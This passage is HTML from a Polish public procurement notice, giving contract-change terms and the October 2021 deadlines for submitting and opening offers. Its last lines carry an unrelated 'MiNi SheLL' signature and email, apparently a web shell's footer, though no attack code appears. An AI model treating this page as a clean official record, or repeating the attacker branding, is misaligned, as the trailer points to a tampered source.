class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z przepisami PZP <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com